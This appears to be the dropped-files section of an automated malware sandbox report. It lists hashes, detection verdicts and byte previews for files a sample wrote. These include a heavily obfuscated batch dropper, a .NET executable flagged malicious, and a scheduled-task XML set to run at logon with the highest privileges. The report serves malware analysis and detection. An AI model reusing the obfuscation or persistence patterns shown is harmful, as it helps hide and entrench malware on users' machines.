                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (3511), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):7312129
                                                        Entropy (8bit):6.017050343783169
                                                        Encrypted:false
                                                        SSDEEP:49152:wDYqqQ9PgglFCYjq3HsyU+CwUp7B+Li23ovqJ+dwvnP/SRqRIEIS1x3KMb/ASHc0:h
                                                        MD5:3839596A3F33711ABCE263E7D890B2E9
                                                        SHA1:185A35A99A20422843725342C374EBAE76B76FDC
                                                        SHA-256:AC0C9AD2975E52B69068D331E25C0F7E1AAA2976651794B1EEADF5A3529BCAF0
                                                        SHA-512:D00D7BB5F7CDBEA678B03A312DF249F2F7550462A7E81151E7DB960C8F05D61D91B4BA03F89BF107D8419540897B056408FD21A68B408F122AA9906A9A1F348A
                                                        Malicious:false
                                                        Preview:@echo off..%RKvQjzEhGUtCzoCqSvuaYKSBifusrwnQWHuUlxqUJiLDfoFwJELgAXS%@%RUIeelQjHDGRTIeuf%%rQZpvTzYIMLgqYPncrPlPyrBWCIOCbzqbZGbh%e%yOFfDdyAmHcGFNFTLTyysTlLwGnufqsNfzSaGJUo%%wpaMVvMLhoND%c%kEDUJWQeuVpoBfUEmcYkvVDkYAlAJXcEkvpnwMZYxXbuKxu%%RgUmPsnobsViLpvxSKdfQHiAca%h%yUjzBgVJCcQPRiameRRnhCEBaupzkYukOGPuRTtcPGSucUlXPu%%IkNEWpIzhQwzEI%o%alsGvlxPxBJkyfisJPUMZbbTejtmlthoMwTZEjZSkvp%%mfjtYyMJKVGZk% %BmRlEduvybliNAQbBEMYGZZZnNGxEQQUPfHM%%ZRmJRHhiQKm%o%ItbnmSCmRXRwWRHlqtISdZCNzoPrRRxcuFVwOHDneAkbZPNaaWRxctPIR%%NXclvZAOcqVkwIQvODPANKBPr%f%aaaaPmFAUFkTekBlMwePziHGFlTqAcwnTAZzNbBJFWOklVyFZCYfKCvRttv%%spZSjWZEkbxKVukDuwvJNnqYeqCreiguFWqpXVboW%f%vXenjqsSxWYMRfYaNStHzbUdfYdUGyuhNTSsURgmZmLkwTflrWhiUoutdb%..%lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkc
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36864
                                                        Entropy (8bit):4.3900594222407125
                                                        Encrypted:false
                                                        SSDEEP:384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
                                                        MD5:B943A57BDF1BBD9C33AB0D33FF885983
                                                        SHA1:1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
                                                        SHA-256:878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
                                                        SHA-512:CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Joe Sandbox View:
                                                        • Filename: product.bat, Detection: malicious, Browse
                                                        • Filename: Hydra.ccLoader.bat, Detection: malicious, Browse
                                                        • Filename: NhoqAfkhHL.bat, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G.*.I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.|/..J3....?.vMl.-.P...)...RZ..-....|.0.x.....D.....>...G...C..e.....IZem...s....|.l~.c........<d.*..y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (3511), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):7312129
                                                        Entropy (8bit):6.017050343783169
                                                        Encrypted:false
                                                        SSDEEP:49152:wDYqqQ9PgglFCYjq3HsyU+CwUp7B+Li23ovqJ+dwvnP/SRqRIEIS1x3KMb/ASHc0:h
                                                        MD5:3839596A3F33711ABCE263E7D890B2E9
                                                        SHA1:185A35A99A20422843725342C374EBAE76B76FDC
                                                        SHA-256:AC0C9AD2975E52B69068D331E25C0F7E1AAA2976651794B1EEADF5A3529BCAF0
                                                        SHA-512:D00D7BB5F7CDBEA678B03A312DF249F2F7550462A7E81151E7DB960C8F05D61D91B4BA03F89BF107D8419540897B056408FD21A68B408F122AA9906A9A1F348A
                                                        Malicious:true
                                                        Preview:@echo off..%RKvQjzEhGUtCzoCqSvuaYKSBifusrwnQWHuUlxqUJiLDfoFwJELgAXS%@%RUIeelQjHDGRTIeuf%%rQZpvTzYIMLgqYPncrPlPyrBWCIOCbzqbZGbh%e%yOFfDdyAmHcGFNFTLTyysTlLwGnufqsNfzSaGJUo%%wpaMVvMLhoND%c%kEDUJWQeuVpoBfUEmcYkvVDkYAlAJXcEkvpnwMZYxXbuKxu%%RgUmPsnobsViLpvxSKdfQHiAca%h%yUjzBgVJCcQPRiameRRnhCEBaupzkYukOGPuRTtcPGSucUlXPu%%IkNEWpIzhQwzEI%o%alsGvlxPxBJkyfisJPUMZbbTejtmlthoMwTZEjZSkvp%%mfjtYyMJKVGZk% %BmRlEduvybliNAQbBEMYGZZZnNGxEQQUPfHM%%ZRmJRHhiQKm%o%ItbnmSCmRXRwWRHlqtISdZCNzoPrRRxcuFVwOHDneAkbZPNaaWRxctPIR%%NXclvZAOcqVkwIQvODPANKBPr%f%aaaaPmFAUFkTekBlMwePziHGFlTqAcwnTAZzNbBJFWOklVyFZCYfKCvRttv%%spZSjWZEkbxKVukDuwvJNnqYeqCreiguFWqpXVboW%f%vXenjqsSxWYMRfYaNStHzbUdfYdUGyuhNTSsURgmZmLkwTflrWhiUoutdb%..%lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkc
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):3494
                                                        Entropy (8bit):3.5825816983996557
                                                        Encrypted:false
                                                        SSDEEP:96:tp2Znkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:CJkYx39OhO6jy++
                                                        MD5:4E4ACA4A800CFAE1555EBA88D1065300
                                                        SHA1:AE909A9F2A9AC72C58F5781B0BF59EE64CA2F91C
                                                        SHA-256:3AF42BCE705FC7EB32B9BDC5471DFAD9E82EE5B4643B9237C663EC82FE901AD2
                                                        SHA-512:3E3CE090AC3ECB51F6FB53DEAE0CA91EE9D1F7A4F482CC31D6DF1C3D054E6B42C8C9A642A56A2A8CA369DC57E05F54B9194D21BF7D4ADE9908D711F2D6C12972
                                                        Malicious:false
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.1.3.T.0.7.:.4.5.:.4.1...9.4.9.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.S.g.I.a.u.a.z.Y.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):3376
                                                        Entropy (8bit):3.929829131899758
                                                        Encrypted:false
                                                        SSDEEP:48:Ms5/nrP+sXCrPwfFRVEfWb3/OoNMiyTL3W5HSqdrSDFDSL3:D/9Crup/vOo+xLG1joFe3
                                                        MD5:E17C2C0005DEDC7E29ED73894D40681F
                                                        SHA1:A3CF98208B105CB56CCD46DCE8AED98D948CE5DB
                                                        SHA-256:1E7F7062650CD365E5FBB1E94AA8CBEE61E9046A119A436C3E7DB3FB63BAF52F
                                                        SHA-512:18F2DD9BA7E71141BCE73F450F32024854A0E31790835469B035BFE87FF8ACF3DA2025C5C8CBFC217B976CF4604BBB9AD5C1D6D0AAF090F9AD3F5FCE558DC75F
                                                        Malicious:false
                                                        Preview:ElfChnk.................u.......v...........X...0......Z....................................................................d.e.............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...............................................~...**..X...u.........@(\M..........D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.1666402962089175
                                                        Encrypted:false
                                                        SSDEEP:384:ahe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842Al:aVUHiapX7xadptrDT9W84D
                                                        MD5:A74CE5C6257805D2551C46277CE2263B
                                                        SHA1:234D67DD4FB9DD141141C4B8BEC7F8EE019E72DC
                                                        SHA-256:1F3C37BAF8BD01FA479E4CB6DA3A6819D613A0D4703466980823C5B15F410C1A
                                                        SHA-512:38E4A74E8395EC245409A76B138639AC20CB6A199921A2982F0D7AED44389CBD3A0EC1AB4521286708A7A01126CE382EF7124860D7150B0C1E6C6E5F3FD01C66
                                                        Malicious:false
                                                        Preview:ElfChnk.........1...............1...........p........T.b.....................................................................6mL................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.010692427789071
                                                        Encrypted:false
                                                        SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                        MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                        SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                        SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                        SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                        Malicious:false
                                                        Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66960
                                                        Entropy (8bit):4.165713242110943
                                                        Encrypted:false
                                                        SSDEEP:384:gVdVghfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgVm:Vhfhd0UNt
                                                        MD5:5D3889F991D37BD701DD4E4C146880CB
                                                        SHA1:E601669B1DECC111185B0B8D71C28E73A64CA18C
                                                        SHA-256:B3B043AC976889C5A62D5290265D90F1AC519BCCB2A01B0A931EF91018A80076
                                                        SHA-512:27806AE63B4C18265AFD1EA0D88DC26CA37082037D4AC6788CB88B26831E093797F8A5954098E3746214F6859796D90C91CFE90FD03002243D7A4CCF0802483E
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................X... ......a....................................................................b..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............h:.&\M............&...............................................................@.......X...a.!.....E..........@h:.&\M....&O.....q'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....i.c....**...............S.&\M..........
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.4281985572602
                                                        Encrypted:false
                                                        SSDEEP:384:QhTm5mc5mNQ9momTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:QdfD6CL49mVpgwQFQ
                                                        MD5:4D2A74DDCE0E933295361813745332B4
                                                        SHA1:CC9B6665552A463E15B9DC86DA8C6BCF4A402BDE
                                                        SHA-256:A10063A089800F4FA943F4F37A02CBB1A9F0C9B792D846FEDCEF5ECC722A7746
                                                        SHA-512:F905C36D00B5713C4528164832A52FD8BA9AE04116F845EC3251573D76553A985D991FA93CCCDC33B55AFDC8A9238D0B1AAD78FBC6BB9B520DC434499C9BFDB2
                                                        Malicious:false
                                                        Preview:ElfChnk..!.......!.......!.......!..................`B..........................................................................................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.35238183906338816
                                                        Encrypted:false
                                                        SSDEEP:48:MPsWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyRdHLP7jMLckH58yk8:DNVaO8sMa3Z85ZML4rjjO3Z85Zu
                                                        MD5:A1AA11A4FDFB5E94FC4CB849323ACBD5
                                                        SHA1:FFABB9CDF5F5FAE6AEF2A046924A7580631BD67F
                                                        SHA-256:081C893D4E499275097C5661595010C1D7D74628E486A4F5277699EAEF31ACFF
                                                        SHA-512:76B8A3DE8CB26A613D16C47F65378DA8E7D9A4D9189C520E428FD8265B053854AC50A51EE4EDF910E025CF87A987CBE6E2B3B1995CB611F2CE7B7B0B0D43533E
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................p.................................................................................W3............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.014860518194814
                                                        Encrypted:false
                                                        SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                        MD5:4FB8E2CF8B3F20534836684947962DC2
                                                        SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                        SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                        SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                        Malicious:false
                                                        Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.15655690871689
                                                        Encrypted:false
                                                        SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                        MD5:2DE60575CB719BF51FAB8A63F696B052
                                                        SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                        SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                        SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                        Malicious:false
                                                        Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.6158707870316427
                                                        Encrypted:false
                                                        SSDEEP:384:Xhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorRor9orwTorYorDor+Y8:XDCYAb
                                                        MD5:7D96A672043812D898757610705AF164
                                                        SHA1:17AB04259076DC75C03E9C2FC38F6B501B7A3C1D
                                                        SHA-256:DEDA61C92BD81305343E512A227080BFC795A05D4112354FBB916436DC9CF26C
                                                        SHA-512:6CB3D9291892A865C3AA09BFED4908458E19FA1518149B22D13421F83A23D43EAA9CBD9D5369E3447D9DA211C592162BCAEEBD738A310123120241200D679D02
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................8J..pL..\5 .....................................................................M$is................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8524226245257144
                                                        Encrypted:false
                                                        SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                        MD5:B8E105CC52B7107E2757421373CBA144
                                                        SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                        SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                        SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                        Malicious:false
                                                        Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8432997252442703
                                                        Encrypted:false
                                                        SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                        MD5:39EE3557626C7F112A88A4DE12E904C1
                                                        SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                        SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                        SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                        Malicious:false
                                                        Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.9223892466691472
                                                        Encrypted:false
                                                        SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                        MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                        SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                        SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                        SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                        Malicious:false
                                                        Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.838106263184782
                                                        Encrypted:false
                                                        SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                        MD5:A2D41740C1BAF781019F282E37288DDF
                                                        SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                        SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                        SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                        Malicious:false
